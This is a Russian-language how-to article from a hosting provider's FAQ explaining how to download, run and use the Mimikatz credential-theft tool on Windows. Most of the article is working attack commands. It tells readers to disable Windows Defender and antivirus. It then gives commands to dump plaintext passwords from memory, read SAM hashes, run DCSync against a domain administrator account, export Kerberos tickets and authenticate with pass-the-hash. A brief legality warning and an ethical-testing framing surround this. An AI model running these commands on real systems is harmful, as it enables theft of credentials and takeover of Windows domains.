Открыть заявку в службу поддержки
Круглосуточная поддержка клиентов
Открыть заявку в службу поддержки Пообщайтесь с экспертом AVAHOST
Russian Flag Русский
Войти
info@ava-host.com
Регистрация Войти

Главная » FAQ » Как установить и использовать Mimikatz на Windows OS

Как установить и использовать Mimikatz на Windows OS

Popular:
УЛУЧШИТЕ НАСТРОЙКУ СЕРВЕРА! ПОДКЛЮЧИТЕ AVA И ЗАПУСТИТЕ С 15% СКИДКОЙ
ИСПОЛЬЗУЙ ПРОМО
March 7, 2025 13:41 1 min

Введение

Mimikatz — это мощный инструмент постэксплуатации, предназначенный для извлечения паролей в открытом виде, хешей, PIN-кодов и билетов Kerberos из памяти. Он широко используется тестировщиками на проникновение и специалистами по безопасности для оценки уязвимостей системы. Этот гид предоставляет пошаговый подход к установке и использованию Mimikatz для этичного тестирования безопасности.

Внимание: Неавторизованное использование Mimikatz является незаконным. Убедитесь, что у вас есть разрешение перед его использованием в любой среде.

Предварительные требования

Перед установкой Mimikatz убедитесь, что у вас есть следующее:

  • Машина с Windows 7, 10, 11 или серверные версии
  • Административные привилегии
  • Отключенный Windows Defender и любое антивирусное программное обеспечение (Mimikatz часто помечается как вредоносное ПО)

Скачивание Mimikatz

Mimikatz — это инструмент с открытым исходным кодом, доступный на GitHub. Чтобы скачать его:

  1. Откройте веб-браузер и перейдите по адресу https://github.com/gentilkiwi/mimikatz.
  2. Нажмите на Code > Download ZIP.
  3. Извлеките ZIP-файл в папку по вашему выбору.

В качестве альтернативы вы можете клонировать репозиторий с помощью Git:

 git clone https://github.com/gentilkiwi/mimikatz.git

Запуск Mimikatz

Поскольку Mimikatz требует административных привилегий, выполните следующие шаги для его запуска:

  1. Откройте Командную строку или PowerShell от имени администратора.
  2. Перейдите в папку, куда вы извлекли Mimikatz:
    cd pathtomimikatzx64
  3. Запустите Mimikatz:
    mimikatz.exe
  4. Вы должны увидеть интерфейс командной строки с подсказкой
    mimikatz #

    .

Основные команды Mimikatz

1. Проверка системных привилегий

Перед извлечением учетных данных убедитесь, что у вас достаточно привилегий:

privilege::debug

Если успешно, вы должны увидеть:

Privilege '20' OK

2. Извлечение паролей из памяти

Чтобы извлечь пароли в открытом виде из памяти, используйте:

sekurlsa::logonpasswords

Это отобразит имя пользователя, домен и пароли в открытом виде, если они доступны.

3. Извлечение хешей NTLM

Хеши NTLM могут быть использованы для атак pass-the-hash. Чтобы извлечь их, выполните:

lsadump::sam

Или, для удаленных систем:

lsadump::dcsync /domain:targetdomain.com /user:Administrator

4. Извлечение билетов Kerberos

Чтобы получить билеты Kerberos из системы:

sekurlsa::tickets /export

Это экспортирует файлы

.kirbi

, которые могут быть использованы в атаках pass-the-ticket.

5. Атака pass-the-hash

Чтобы аутентифицироваться с помощью хеша NTLM вместо пароля:

sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<hash>

Похожие записи

Как исправить ошибку “Невозможно обеспечить безопасное соединение”

Ошибка “Не удается обеспечить безопасное соединение” в вашем браузере может расстроить, особенно при попытке доступа к важным веб-сайтам. Эта ошибка...

Mar 24, 20251 min

Ожидаемые обновления и разработки, которые повлияют на Linux в 2024 году

Улучшения в ядре Пожалуй, самое важное обновление, на котором стоит остановиться, – это обновление ядра. Ядро Linux служит ядром операционной...

Aug 6, 20241 min

5 лучших команд PowerShell

Что такое PowerShell? Многие наверняка уже знают об этом инструменте, но в этой статье мы все же разъясним его. PowerShell...

Jun 2, 20251 min